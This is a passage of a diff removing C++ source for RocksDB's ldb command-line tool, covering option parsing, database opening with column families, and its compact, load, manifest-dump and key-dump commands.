-      st = DBWithTTL::Open(opt, db_path_, &db_ttl_);
-    }
-    db_ = db_ttl_;
-  } else {
-    if (!opt_set && column_families_.empty()) {
-      // Try to figure out column family lists
-      std::vector<std::string> cf_list;
-      st = DB::ListColumnFamilies(DBOptions(), db_path_, &cf_list);
-      // There is possible the DB doesn't exist yet, for "create if not
-      // "existing case". The failure is ignored here. We rely on DB::Open()
-      // to give us the correct error message for problem with opening
-      // existing DB.
-      if (st.ok() && cf_list.size() > 1) {
-        // Ignore single column family DB.
-        for (auto cf_name : cf_list) {
-          column_families_.emplace_back(cf_name, opt);
-        }
-      }
-    }
-    if (is_read_only_) {
-      if (column_families_.empty()) {
-        st = DB::OpenForReadOnly(opt, db_path_, &db_);
-      } else {
-        st = DB::OpenForReadOnly(opt, db_path_, column_families_,
-                                 &handles_opened, &db_);
-      }
-    } else {
-      if (column_families_.empty()) {
-        st = DB::Open(opt, db_path_, &db_);
-      } else {
-        st = DB::Open(opt, db_path_, column_families_, &handles_opened, &db_);
-      }
-    }
-  }
-  if (!st.ok()) {
-    std::string msg = st.ToString();
-    exec_state_ = LDBCommandExecuteResult::Failed(msg);
-  } else if (!handles_opened.empty()) {
-    assert(handles_opened.size() == column_families_.size());
-    bool found_cf_name = false;
-    for (size_t i = 0; i < handles_opened.size(); i++) {
-      cf_handles_[column_families_[i].name] = handles_opened[i];
-      if (column_family_name_ == column_families_[i].name) {
-        found_cf_name = true;
-      }
-    }
-    if (!found_cf_name) {
-      exec_state_ = LDBCommandExecuteResult::Failed(
-          "Non-existing column family " + column_family_name_);
-      CloseDB();
-    }
-  } else {
-    // We successfully opened DB in single column family mode.
-    assert(column_families_.empty());
-    if (column_family_name_ != kDefaultColumnFamilyName) {
-      exec_state_ = LDBCommandExecuteResult::Failed(
-          "Non-existing column family " + column_family_name_);
-      CloseDB();
-    }
-  }
-
-  options_ = opt;
-}
-
-void LDBCommand::CloseDB() {
-  if (db_ != nullptr) {
-    for (auto& pair : cf_handles_) {
-      delete pair.second;
-    }
-    delete db_;
-    db_ = nullptr;
-  }
-}
-
-ColumnFamilyHandle* LDBCommand::GetCfHandle() {
-  if (!cf_handles_.empty()) {
-    auto it = cf_handles_.find(column_family_name_);
-    if (it == cf_handles_.end()) {
-      exec_state_ = LDBCommandExecuteResult::Failed(
-          "Cannot find column family " + column_family_name_);
-    } else {
-      return it->second;
-    }
-  }
-  return db_->DefaultColumnFamily();
-}
-
-std::vector<std::string> LDBCommand::BuildCmdLineOptions(
-    std::vector<std::string> options) {
-  std::vector<std::string> ret = {ARG_DB,
-                                  ARG_BLOOM_BITS,
-                                  ARG_BLOCK_SIZE,
-                                  ARG_AUTO_COMPACTION,
-                                  ARG_COMPRESSION_TYPE,
-                                  ARG_COMPRESSION_MAX_DICT_BYTES,
-                                  ARG_WRITE_BUFFER_SIZE,
-                                  ARG_FILE_SIZE,
-                                  ARG_FIX_PREFIX_LEN,
-                                  ARG_TRY_LOAD_OPTIONS,
-                                  ARG_IGNORE_UNKNOWN_OPTIONS,
-                                  ARG_CF_NAME};
-  ret.insert(ret.end(), options.begin(), options.end());
-  return ret;
-}
-
-/**
- * Parses the specific integer option and fills in the value.
- * Returns true if the option is found.
- * Returns false if the option is not found or if there is an error parsing the
- * value.  If there is an error, the specified exec_state is also
- * updated.
- */
-bool LDBCommand::ParseIntOption(
-    const std::map<std::string, std::string>& options,
-    const std::string& option, int& value,
-    LDBCommandExecuteResult& exec_state) {
-  std::map<std::string, std::string>::const_iterator itr =
-      option_map_.find(option);
-  if (itr != option_map_.end()) {
-    try {
-#if defined(CYGWIN)
-      value = strtol(itr->second.c_str(), 0, 10);
-#else
-      value = std::stoi(itr->second);
-#endif
-      return true;
-    } catch (const std::invalid_argument&) {
-      exec_state =
-          LDBCommandExecuteResult::Failed(option + " has an invalid value.");
-    } catch (const std::out_of_range&) {
-      exec_state = LDBCommandExecuteResult::Failed(
-          option + " has a value out-of-range.");
-    }
-  }
-  return false;
-}
-
-/**
- * Parses the specified option and fills in the value.
- * Returns true if the option is found.
- * Returns false otherwise.
- */
-bool LDBCommand::ParseStringOption(
-    const std::map<std::string, std::string>& options,
-    const std::string& option, std::string* value) {
-  auto itr = option_map_.find(option);
-  if (itr != option_map_.end()) {
-    *value = itr->second;
-    return true;
-  }
-  return false;
-}
-
-Options LDBCommand::PrepareOptionsForOpenDB() {
-
-  Options opt = options_;
-  opt.create_if_missing = false;
-
-  std::map<std::string, std::string>::const_iterator itr;
-
-  BlockBasedTableOptions table_options;
-  bool use_table_options = false;
-  int bits;
-  if (ParseIntOption(option_map_, ARG_BLOOM_BITS, bits, exec_state_)) {
-    if (bits > 0) {
-      use_table_options = true;
-      table_options.filter_policy.reset(NewBloomFilterPolicy(bits));
-    } else {
-      exec_state_ =
-          LDBCommandExecuteResult::Failed(ARG_BLOOM_BITS + " must be > 0.");
-    }
-  }
-
-  int block_size;
-  if (ParseIntOption(option_map_, ARG_BLOCK_SIZE, block_size, exec_state_)) {
-    if (block_size > 0) {
-      use_table_options = true;
-      table_options.block_size = block_size;
-    } else {
-      exec_state_ =
-          LDBCommandExecuteResult::Failed(ARG_BLOCK_SIZE + " must be > 0.");
-    }
-  }
-
-  if (use_table_options) {
-    opt.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  }
-
-  itr = option_map_.find(ARG_AUTO_COMPACTION);
-  if (itr != option_map_.end()) {
-    opt.disable_auto_compactions = ! StringToBool(itr->second);
-  }
-
-  itr = option_map_.find(ARG_COMPRESSION_TYPE);
-  if (itr != option_map_.end()) {
-    std::string comp = itr->second;
-    if (comp == "no") {
-      opt.compression = kNoCompression;
-    } else if (comp == "snappy") {
-      opt.compression = kSnappyCompression;
-    } else if (comp == "zlib") {
-      opt.compression = kZlibCompression;
-    } else if (comp == "bzip2") {
-      opt.compression = kBZip2Compression;
-    } else if (comp == "lz4") {
-      opt.compression = kLZ4Compression;
-    } else if (comp == "lz4hc") {
-      opt.compression = kLZ4HCCompression;
-    } else if (comp == "xpress") {
-      opt.compression = kXpressCompression;
-    } else if (comp == "zstd") {
-      opt.compression = kZSTD;
-    } else {
-      // Unknown compression.
-      exec_state_ =
-          LDBCommandExecuteResult::Failed("Unknown compression level: " + comp);
-    }
-  }
-
-  int compression_max_dict_bytes;
-  if (ParseIntOption(option_map_, ARG_COMPRESSION_MAX_DICT_BYTES,
-                     compression_max_dict_bytes, exec_state_)) {
-    if (compression_max_dict_bytes >= 0) {
-      opt.compression_opts.max_dict_bytes = compression_max_dict_bytes;
-    } else {
-      exec_state_ = LDBCommandExecuteResult::Failed(
-          ARG_COMPRESSION_MAX_DICT_BYTES + " must be >= 0.");
-    }
-  }
-
-  int db_write_buffer_size;
-  if (ParseIntOption(option_map_, ARG_DB_WRITE_BUFFER_SIZE,
-        db_write_buffer_size, exec_state_)) {
-    if (db_write_buffer_size >= 0) {
-      opt.db_write_buffer_size = db_write_buffer_size;
-    } else {
-      exec_state_ = LDBCommandExecuteResult::Failed(ARG_DB_WRITE_BUFFER_SIZE +
-                                                    " must be >= 0.");
-    }
-  }
-
-  int write_buffer_size;
-  if (ParseIntOption(option_map_, ARG_WRITE_BUFFER_SIZE, write_buffer_size,
-        exec_state_)) {
-    if (write_buffer_size > 0) {
-      opt.write_buffer_size = write_buffer_size;
-    } else {
-      exec_state_ = LDBCommandExecuteResult::Failed(ARG_WRITE_BUFFER_SIZE +
-                                                    " must be > 0.");
-    }
-  }
-
-  int file_size;
-  if (ParseIntOption(option_map_, ARG_FILE_SIZE, file_size, exec_state_)) {
-    if (file_size > 0) {
-      opt.target_file_size_base = file_size;
-    } else {
-      exec_state_ =
-          LDBCommandExecuteResult::Failed(ARG_FILE_SIZE + " must be > 0.");
-    }
-  }
-
-  if (opt.db_paths.size() == 0) {
-    opt.db_paths.emplace_back(db_path_, std::numeric_limits<uint64_t>::max());
-  }
-
-  int fix_prefix_len;
-  if (ParseIntOption(option_map_, ARG_FIX_PREFIX_LEN, fix_prefix_len,
-                     exec_state_)) {
-    if (fix_prefix_len > 0) {
-      opt.prefix_extractor.reset(
-          NewFixedPrefixTransform(static_cast<size_t>(fix_prefix_len)));
-    } else {
-      exec_state_ =
-          LDBCommandExecuteResult::Failed(ARG_FIX_PREFIX_LEN + " must be > 0.");
-    }
-  }
-
-  return opt;
-}
-
-bool LDBCommand::ParseKeyValue(const std::string& line, std::string* key,
-                               std::string* value, bool is_key_hex,
-                               bool is_value_hex) {
-  size_t pos = line.find(DELIM);
-  if (pos != std::string::npos) {
-    *key = line.substr(0, pos);
-    *value = line.substr(pos + strlen(DELIM));
-    if (is_key_hex) {
-      *key = HexToString(*key);
-    }
-    if (is_value_hex) {
-      *value = HexToString(*value);
-    }
-    return true;
-  } else {
-    return false;
-  }
-}
-
-/**
- * Make sure that ONLY the command-line options and flags expected by this
- * command are specified on the command-line.  Extraneous options are usually
- * the result of user error.
- * Returns true if all checks pass.  Else returns false, and prints an
- * appropriate error msg to stderr.
- */
-bool LDBCommand::ValidateCmdLineOptions() {
-  for (std::map<std::string, std::string>::const_iterator itr =
-           option_map_.begin();
-       itr != option_map_.end(); ++itr) {
-    if (std::find(valid_cmd_line_options_.begin(),
-                  valid_cmd_line_options_.end(),
-                  itr->first) == valid_cmd_line_options_.end()) {
-      fprintf(stderr, "Invalid command-line option %s\n", itr->first.c_str());
-      return false;
-    }
-  }
-
-  for (std::vector<std::string>::const_iterator itr = flags_.begin();
-       itr != flags_.end(); ++itr) {
-    if (std::find(valid_cmd_line_options_.begin(),
-                  valid_cmd_line_options_.end(),
-                  *itr) == valid_cmd_line_options_.end()) {
-      fprintf(stderr, "Invalid command-line flag %s\n", itr->c_str());
-      return false;
-    }
-  }
-
-  if (!NoDBOpen() && option_map_.find(ARG_DB) == option_map_.end() &&
-      option_map_.find(ARG_PATH) == option_map_.end()) {
-    fprintf(stderr, "Either %s or %s must be specified.\n", ARG_DB.c_str(),
-            ARG_PATH.c_str());
-    return false;
-  }
-
-  return true;
-}
-
-std::string LDBCommand::HexToString(const std::string& str) {
-  std::string result;
-  std::string::size_type len = str.length();
-  if (len < 2 || str[0] != '0' || str[1] != 'x') {
-    fprintf(stderr, "Invalid hex input %s.  Must start with 0x\n", str.c_str());
-    throw "Invalid hex input";
-  }
-  if (!Slice(str.data() + 2, len - 2).DecodeHex(&result)) {
-    throw "Invalid hex input";
-  }
-  return result;
-}
-
-std::string LDBCommand::StringToHex(const std::string& str) {
-  std::string result("0x");
-  result.append(Slice(str).ToString(true));
-  return result;
-}
-
-std::string LDBCommand::PrintKeyValue(const std::string& key,
-                                      const std::string& value, bool is_key_hex,
-                                      bool is_value_hex) {
-  std::string result;
-  result.append(is_key_hex ? StringToHex(key) : key);
-  result.append(DELIM);
-  result.append(is_value_hex ? StringToHex(value) : value);
-  return result;
-}
-
-std::string LDBCommand::PrintKeyValue(const std::string& key,
-                                      const std::string& value, bool is_hex) {
-  return PrintKeyValue(key, value, is_hex, is_hex);
-}
-
-std::string LDBCommand::HelpRangeCmdArgs() {
-  std::ostringstream str_stream;
-  str_stream << " ";
-  str_stream << "[--" << ARG_FROM << "] ";
-  str_stream << "[--" << ARG_TO << "] ";
-  return str_stream.str();
-}
-
-bool LDBCommand::IsKeyHex(const std::map<std::string, std::string>& options,
-                          const std::vector<std::string>& flags) {
-  return (IsFlagPresent(flags, ARG_HEX) || IsFlagPresent(flags, ARG_KEY_HEX) ||
-          ParseBooleanOption(options, ARG_HEX, false) ||
-          ParseBooleanOption(options, ARG_KEY_HEX, false));
-}
-
-bool LDBCommand::IsValueHex(const std::map<std::string, std::string>& options,
-                            const std::vector<std::string>& flags) {
-  return (IsFlagPresent(flags, ARG_HEX) ||
-          IsFlagPresent(flags, ARG_VALUE_HEX) ||
-          ParseBooleanOption(options, ARG_HEX, false) ||
-          ParseBooleanOption(options, ARG_VALUE_HEX, false));
-}
-
-bool LDBCommand::ParseBooleanOption(
-    const std::map<std::string, std::string>& options,
-    const std::string& option, bool default_val) {
-  std::map<std::string, std::string>::const_iterator itr = options.find(option);
-  if (itr != options.end()) {
-    std::string option_val = itr->second;
-    return StringToBool(itr->second);
-  }
-  return default_val;
-}
-
-bool LDBCommand::StringToBool(std::string val) {
-  std::transform(val.begin(), val.end(), val.begin(),
-                 [](char ch) -> char { return (char)::tolower(ch); });
-
-  if (val == "true") {
-    return true;
-  } else if (val == "false") {
-    return false;
-  } else {
-    throw "Invalid value for boolean argument";
-  }
-}
-
-CompactorCommand::CompactorCommand(
-    const std::vector<std::string>& params,
-    const std::map<std::string, std::string>& options,
-    const std::vector<std::string>& flags)
-    : LDBCommand(options, flags, false,
-                 BuildCmdLineOptions({ARG_FROM, ARG_TO, ARG_HEX, ARG_KEY_HEX,
-                                      ARG_VALUE_HEX, ARG_TTL})),
-      null_from_(true),
-      null_to_(true) {
-  std::map<std::string, std::string>::const_iterator itr =
-      options.find(ARG_FROM);
-  if (itr != options.end()) {
-    null_from_ = false;
-    from_ = itr->second;
-  }
-
-  itr = options.find(ARG_TO);
-  if (itr != options.end()) {
-    null_to_ = false;
-    to_ = itr->second;
-  }
-
-  if (is_key_hex_) {
-    if (!null_from_) {
-      from_ = HexToString(from_);
-    }
-    if (!null_to_) {
-      to_ = HexToString(to_);
-    }
-  }
-}
-
-void CompactorCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(CompactorCommand::Name());
-  ret.append(HelpRangeCmdArgs());
-  ret.append("\n");
-}
-
-void CompactorCommand::DoCommand() {
-  if (!db_) {
-    assert(GetExecuteState().IsFailed());
-    return;
-  }
-
-  Slice* begin = nullptr;
-  Slice* end = nullptr;
-  if (!null_from_) {
-    begin = new Slice(from_);
-  }
-  if (!null_to_) {
-    end = new Slice(to_);
-  }
-
-  CompactRangeOptions cro;
-  cro.bottommost_level_compaction = BottommostLevelCompaction::kForce;
-
-  db_->CompactRange(cro, GetCfHandle(), begin, end);
-  exec_state_ = LDBCommandExecuteResult::Succeed("");
-
-  delete begin;
-  delete end;
-}
-
-// ----------------------------------------------------------------------------
-
-const std::string DBLoaderCommand::ARG_DISABLE_WAL = "disable_wal";
-const std::string DBLoaderCommand::ARG_BULK_LOAD = "bulk_load";
-const std::string DBLoaderCommand::ARG_COMPACT = "compact";
-
-DBLoaderCommand::DBLoaderCommand(
-    const std::vector<std::string>& params,
-    const std::map<std::string, std::string>& options,
-    const std::vector<std::string>& flags)
-    : LDBCommand(
-          options, flags, false,
-          BuildCmdLineOptions({ARG_HEX, ARG_KEY_HEX, ARG_VALUE_HEX, ARG_FROM,
-                               ARG_TO, ARG_CREATE_IF_MISSING, ARG_DISABLE_WAL,
-                               ARG_BULK_LOAD, ARG_COMPACT})),
-      disable_wal_(false),
-      bulk_load_(false),
-      compact_(false) {
-  create_if_missing_ = IsFlagPresent(flags, ARG_CREATE_IF_MISSING);
-  disable_wal_ = IsFlagPresent(flags, ARG_DISABLE_WAL);
-  bulk_load_ = IsFlagPresent(flags, ARG_BULK_LOAD);
-  compact_ = IsFlagPresent(flags, ARG_COMPACT);
-}
-
-void DBLoaderCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(DBLoaderCommand::Name());
-  ret.append(" [--" + ARG_CREATE_IF_MISSING + "]");
-  ret.append(" [--" + ARG_DISABLE_WAL + "]");
-  ret.append(" [--" + ARG_BULK_LOAD + "]");
-  ret.append(" [--" + ARG_COMPACT + "]");
-  ret.append("\n");
-}
-
-Options DBLoaderCommand::PrepareOptionsForOpenDB() {
-  Options opt = LDBCommand::PrepareOptionsForOpenDB();
-  opt.create_if_missing = create_if_missing_;
-  if (bulk_load_) {
-    opt.PrepareForBulkLoad();
-  }
-  return opt;
-}
-
-void DBLoaderCommand::DoCommand() {
-  if (!db_) {
-    assert(GetExecuteState().IsFailed());
-    return;
-  }
-
-  WriteOptions write_options;
-  if (disable_wal_) {
-    write_options.disableWAL = true;
-  }
-
-  int bad_lines = 0;
-  std::string line;
-  // prefer ifstream getline performance vs that from std::cin istream
-  std::ifstream ifs_stdin("/dev/stdin");
-  std::istream* istream_p = ifs_stdin.is_open() ? &ifs_stdin : &std::cin;
-  while (getline(*istream_p, line, '\n')) {
-    std::string key;
-    std::string value;
-    if (ParseKeyValue(line, &key, &value, is_key_hex_, is_value_hex_)) {
-      db_->Put(write_options, GetCfHandle(), Slice(key), Slice(value));
-    } else if (0 == line.find("Keys in range:")) {
-      // ignore this line
-    } else if (0 == line.find("Created bg thread 0x")) {
-      // ignore this line
-    } else {
-      bad_lines ++;
-    }
-  }
-
-  if (bad_lines > 0) {
-    std::cout << "Warning: " << bad_lines << " bad lines ignored." << std::endl;
-  }
-  if (compact_) {
-    db_->CompactRange(CompactRangeOptions(), GetCfHandle(), nullptr, nullptr);
-  }
-}
-
-// ----------------------------------------------------------------------------
-
-namespace {
-
-void DumpManifestFile(std::string file, bool verbose, bool hex, bool json) {
-  Options options;
-  EnvOptions sopt;
-  std::string dbname("dummy");
-  std::shared_ptr<Cache> tc(NewLRUCache(options.max_open_files - 10,
-                                        options.table_cache_numshardbits));
-  // Notice we are using the default options not through SanitizeOptions(),
-  // if VersionSet::DumpManifest() depends on any option done by
-  // SanitizeOptions(), we need to initialize it manually.
-  options.db_paths.emplace_back("dummy", 0);
-  options.num_levels = 64;
-  WriteController wc(options.delayed_write_rate);
-  WriteBufferManager wb(options.db_write_buffer_size);
-  ImmutableDBOptions immutable_db_options(options);
-  VersionSet versions(dbname, &immutable_db_options, sopt, tc.get(), &wb, &wc);
-  Status s = versions.DumpManifest(options, file, verbose, hex, json);
-  if (!s.ok()) {
-    printf("Error in processing file %s %s\n", file.c_str(),
-           s.ToString().c_str());
-  }
-}
-
-}  // namespace
-
-const std::string ManifestDumpCommand::ARG_VERBOSE = "verbose";
-const std::string ManifestDumpCommand::ARG_JSON = "json";
-const std::string ManifestDumpCommand::ARG_PATH = "path";
-
-void ManifestDumpCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(ManifestDumpCommand::Name());
-  ret.append(" [--" + ARG_VERBOSE + "]");
-  ret.append(" [--" + ARG_JSON + "]");
-  ret.append(" [--" + ARG_PATH + "=<path_to_manifest_file>]");
-  ret.append("\n");
-}
-
-ManifestDumpCommand::ManifestDumpCommand(
-    const std::vector<std::string>& params,
-    const std::map<std::string, std::string>& options,
-    const std::vector<std::string>& flags)
-    : LDBCommand(
-          options, flags, false,
-          BuildCmdLineOptions({ARG_VERBOSE, ARG_PATH, ARG_HEX, ARG_JSON})),
-      verbose_(false),
-      json_(false),
-      path_("") {
-  verbose_ = IsFlagPresent(flags, ARG_VERBOSE);
-  json_ = IsFlagPresent(flags, ARG_JSON);
-
-  std::map<std::string, std::string>::const_iterator itr =
-      options.find(ARG_PATH);
-  if (itr != options.end()) {
-    path_ = itr->second;
-    if (path_.empty()) {
-      exec_state_ = LDBCommandExecuteResult::Failed("--path: missing pathname");
-    }
-  }
-}
-
-void ManifestDumpCommand::DoCommand() {
-
-  std::string manifestfile;
-
-  if (!path_.empty()) {
-    manifestfile = path_;
-  } else {
-    bool found = false;
-    // We need to find the manifest file by searching the directory
-    // containing the db for files of the form MANIFEST_[0-9]+
-
-    auto CloseDir = [](DIR* p) { closedir(p); };
-    std::unique_ptr<DIR, decltype(CloseDir)> d(opendir(db_path_.c_str()),
-                                               CloseDir);
-
-    if (d == nullptr) {
-      exec_state_ =
-          LDBCommandExecuteResult::Failed(db_path_ + " is not a directory");
-      return;
-    }
-    struct dirent* entry;
-    while ((entry = readdir(d.get())) != nullptr) {
-      unsigned int match;
-      uint64_t num;
-      if (sscanf(entry->d_name, "MANIFEST-%" PRIu64 "%n", &num, &match) &&
-          match == strlen(entry->d_name)) {
-        if (!found) {
-          manifestfile = db_path_ + "/" + std::string(entry->d_name);
-          found = true;
-        } else {
-          exec_state_ = LDBCommandExecuteResult::Failed(
-              "Multiple MANIFEST files found; use --path to select one");
-          return;
-        }
-      }
-    }
-  }
-
-  if (verbose_) {
-    printf("Processing Manifest file %s\n", manifestfile.c_str());
-  }
-
-  DumpManifestFile(manifestfile, verbose_, is_key_hex_, json_);
-
-  if (verbose_) {
-    printf("Processing Manifest file %s done\n", manifestfile.c_str());
-  }
-}
-
-// ----------------------------------------------------------------------------
-
-void ListColumnFamiliesCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(ListColumnFamiliesCommand::Name());
-  ret.append(" full_path_to_db_directory ");
-  ret.append("\n");
-}
-
-ListColumnFamiliesCommand::ListColumnFamiliesCommand(
-    const std::vector<std::string>& params,
-    const std::map<std::string, std::string>& options,
-    const std::vector<std::string>& flags)
-    : LDBCommand(options, flags, false, {}) {
-  if (params.size() != 1) {
-    exec_state_ = LDBCommandExecuteResult::Failed(
-        "dbname must be specified for the list_column_families command");
-  } else {
-    dbname_ = params[0];
-  }
-}
-
-void ListColumnFamiliesCommand::DoCommand() {
-  std::vector<std::string> column_families;
-  Status s = DB::ListColumnFamilies(DBOptions(), dbname_, &column_families);
-  if (!s.ok()) {
-    printf("Error in processing db %s %s\n", dbname_.c_str(),
-           s.ToString().c_str());
-  } else {
-    printf("Column families in %s: \n{", dbname_.c_str());
-    bool first = true;
-    for (auto cf : column_families) {
-      if (!first) {
-        printf(", ");
-      }
-      first = false;
-      printf("%s", cf.c_str());
-    }
-    printf("}\n");
-  }
-}
-
-void CreateColumnFamilyCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(CreateColumnFamilyCommand::Name());
-  ret.append(" --db=<db_path> <new_column_family_name>");
-  ret.append("\n");
-}
-
-CreateColumnFamilyCommand::CreateColumnFamilyCommand(
-    const std::vector<std::string>& params,
-    const std::map<std::string, std::string>& options,
-    const std::vector<std::string>& flags)
-    : LDBCommand(options, flags, true, {ARG_DB}) {
-  if (params.size() != 1) {
-    exec_state_ = LDBCommandExecuteResult::Failed(
-        "new column family name must be specified");
-  } else {
-    new_cf_name_ = params[0];
-  }
-}
-
-void CreateColumnFamilyCommand::DoCommand() {
-  ColumnFamilyHandle* new_cf_handle = nullptr;
-  Status st = db_->CreateColumnFamily(options_, new_cf_name_, &new_cf_handle);
-  if (st.ok()) {
-    fprintf(stdout, "OK\n");
-  } else {
-    exec_state_ = LDBCommandExecuteResult::Failed(
-        "Fail to create new column family: " + st.ToString());
-  }
-  delete new_cf_handle;
-  CloseDB();
-}
-
-// ----------------------------------------------------------------------------
-
-namespace {
-
-std::string ReadableTime(int unixtime) {
-  char time_buffer [80];
-  time_t rawtime = unixtime;
-  struct tm tInfo;
-  struct tm* timeinfo = localtime_r(&rawtime, &tInfo);
-  assert(timeinfo == &tInfo);
-  strftime(time_buffer, 80, "%c", timeinfo);
-  return std::string(time_buffer);
-}
-
-// This function only called when it's the sane case of >1 buckets in time-range
-// Also called only when timekv falls between ttl_start and ttl_end provided
-void IncBucketCounts(std::vector<uint64_t>& bucket_counts, int ttl_start,
-                     int time_range, int bucket_size, int timekv,
-                     int num_buckets) {
-  assert(time_range > 0 && timekv >= ttl_start && bucket_size > 0 &&
-    timekv < (ttl_start + time_range) && num_buckets > 1);
-  int bucket = (timekv - ttl_start) / bucket_size;
-  bucket_counts[bucket]++;
-}
-
-void PrintBucketCounts(const std::vector<uint64_t>& bucket_counts,
-                       int ttl_start, int ttl_end, int bucket_size,
-                       int num_buckets) {
-  int time_point = ttl_start;
-  for(int i = 0; i < num_buckets - 1; i++, time_point += bucket_size) {
-    fprintf(stdout, "Keys in range %s to %s : %lu\n",
-            ReadableTime(time_point).c_str(),
-            ReadableTime(time_point + bucket_size).c_str(),
-            (unsigned long)bucket_counts[i]);
-  }
-  fprintf(stdout, "Keys in range %s to %s : %lu\n",
-          ReadableTime(time_point).c_str(),
-          ReadableTime(ttl_end).c_str(),
-          (unsigned long)bucket_counts[num_buckets - 1]);
-}
-
-}  // namespace
-
-const std::string InternalDumpCommand::ARG_COUNT_ONLY = "count_only";
-const std::string InternalDumpCommand::ARG_COUNT_DELIM = "count_delim";
-const std::string InternalDumpCommand::ARG_STATS = "stats";
-const std::string InternalDumpCommand::ARG_INPUT_KEY_HEX = "input_key_hex";
-
-InternalDumpCommand::InternalDumpCommand(
-    const std::vector<std::string>& params,
-    const std::map<std::string, std::string>& options,
-    const std::vector<std::string>& flags)
-    : LDBCommand(
-          options, flags, true,
-          BuildCmdLineOptions({ARG_HEX, ARG_KEY_HEX, ARG_VALUE_HEX, ARG_FROM,
-                               ARG_TO, ARG_MAX_KEYS, ARG_COUNT_ONLY,
-                               ARG_COUNT_DELIM, ARG_STATS, ARG_INPUT_KEY_HEX})),
-      has_from_(false),
-      has_to_(false),
-      max_keys_(-1),
-      delim_("."),
-      count_only_(false),
-      count_delim_(false),
-      print_stats_(false),
-      is_input_key_hex_(false) {
-  has_from_ = ParseStringOption(options, ARG_FROM, &from_);
-  has_to_ = ParseStringOption(options, ARG_TO, &to_);
-
-  ParseIntOption(options, ARG_MAX_KEYS, max_keys_, exec_state_);
-  std::map<std::string, std::string>::const_iterator itr =
-      options.find(ARG_COUNT_DELIM);
-  if (itr != options.end()) {
-    delim_ = itr->second;
-    count_delim_ = true;
-   // fprintf(stdout,"delim = %c\n",delim_[0]);
-  } else {
-    count_delim_ = IsFlagPresent(flags, ARG_COUNT_DELIM);
-    delim_=".";
-  }
-
-  print_stats_ = IsFlagPresent(flags, ARG_STATS);
-  count_only_ = IsFlagPresent(flags, ARG_COUNT_ONLY);
-  is_input_key_hex_ = IsFlagPresent(flags, ARG_INPUT_KEY_HEX);
-
-  if (is_input_key_hex_) {
-    if (has_from_) {
-      from_ = HexToString(from_);
-    }
-    if (has_to_) {
-      to_ = HexToString(to_);
-    }
-  }
-}
-
-void InternalDumpCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(InternalDumpCommand::Name());
-  ret.append(HelpRangeCmdArgs());
-  ret.append(" [--" + ARG_INPUT_KEY_HEX + "]");
-  ret.append(" [--" + ARG_MAX_KEYS + "=<N>]");
-  ret.append(" [--" + ARG_COUNT_ONLY + "]");
-  ret.append(" [--" + ARG_COUNT_DELIM + "=<char>]");
-  ret.append(" [--" + ARG_STATS + "]");
-  ret.append("\n");
-}
-
-void InternalDumpCommand::DoCommand() {
-  if (!db_) {
-    assert(GetExecuteState().IsFailed());
-    return;
-  }
-
-  if (print_stats_) {
-    std::string stats;
-    if (db_->GetProperty(GetCfHandle(), "rocksdb.stats", &stats)) {
-      fprintf(stdout, "%s\n", stats.c_str());
-    }
-  }
-
-  // Cast as DBImpl to get internal iterator
-  std::vector<KeyVersion> key_versions;
-  Status st = GetAllKeyVersions(db_, from_, to_, &key_versions);
-  if (!st.ok()) {
-    exec_state_ = LDBCommandExecuteResult::Failed(st.ToString());
-    return;
-  }
-  std::string rtype1, rtype2, row, val;
-  rtype2 = "";
-  uint64_t c=0;
-  uint64_t s1=0,s2=0;
-
-  long long count = 0;
-  for (auto& key_version : key_versions) {
-    InternalKey ikey(key_version.user_key, key_version.sequence,
-                     static_cast<ValueType>(key_version.type));
-    if (has_to_ && ikey.user_key() == to_) {
-      // GetAllKeyVersions() includes keys with user key `to_`, but idump has
-      // traditionally excluded such keys.
-      break;
-    }
-    ++count;
-    int k;
-    if (count_delim_) {
-      rtype1 = "";
-      s1=0;
-      row = ikey.Encode().ToString();
-      val = key_version.value;
-      for(k=0;row[k]!='\x01' && row[k]!='\0';k++)
-        s1++;
-      for(k=0;val[k]!='\x01' && val[k]!='\0';k++)
-        s1++;
-      for(int j=0;row[j]!=delim_[0] && row[j]!='\0' && row[j]!='\x01';j++)
-        rtype1+=row[j];
-      if(rtype2.compare("") && rtype2.compare(rtype1)!=0) {
-        fprintf(stdout,"%s => count:%lld\tsize:%lld\n",rtype2.c_str(),
-            (long long)c,(long long)s2);
-        c=1;
-        s2=s1;
-        rtype2 = rtype1;
-      } else {
-        c++;
-        s2+=s1;
-        rtype2=rtype1;
-      }
-    }
-
-    if (!count_only_ && !count_delim_) {
-      std::string key = ikey.DebugString(is_key_hex_);
-      std::string value = Slice(key_version.value).ToString(is_value_hex_);
-      std::cout << key << " => " << value << "\n";
-    }
-
-    // Terminate if maximum number of keys have been dumped
-    if (max_keys_ > 0 && count >= max_keys_) break;
-  }
-  if(count_delim_) {
-    fprintf(stdout,"%s => count:%lld\tsize:%lld\n", rtype2.c_str(),
-        (long long)c,(long long)s2);
-  } else
-  fprintf(stdout, "Internal keys in range: %lld\n", (long long) count);
-}
-
-const std::string DBDumperCommand::ARG_COUNT_ONLY = "count_only";
-const std::string DBDumperCommand::ARG_COUNT_DELIM = "count_delim";
-const std::string DBDumperCommand::ARG_STATS = "stats";
-const std::string DBDumperCommand::ARG_TTL_BUCKET = "bucket";
-
-DBDumperCommand::DBDumperCommand(
-    const std::vector<std::string>& params,
-    const std::map<std::string, std::string>& options,
-    const std::vector<std::string>& flags)
-    : LDBCommand(options, flags, true,
-                 BuildCmdLineOptions(
-                     {ARG_TTL, ARG_HEX, ARG_KEY_HEX, ARG_VALUE_HEX, ARG_FROM,
-                      ARG_TO, ARG_MAX_KEYS, ARG_COUNT_ONLY, ARG_COUNT_DELIM,
-                      ARG_STATS, ARG_TTL_START, ARG_TTL_END, ARG_TTL_BUCKET,
-                      ARG_TIMESTAMP, ARG_PATH})),
-      null_from_(true),
-      null_to_(true),
-      max_keys_(-1),
-      count_only_(false),
-      count_delim_(false),
-      print_stats_(false) {
-  std::map<std::string, std::string>::const_iterator itr =
-      options.find(ARG_FROM);
-  if (itr != options.end()) {
-    null_from_ = false;
-    from_ = itr->second;
-  }
-
-  itr = options.find(ARG_TO);
-  if (itr != options.end()) {
-    null_to_ = false;
-    to_ = itr->second;
-  }
-
-  itr = options.find(ARG_MAX_KEYS);
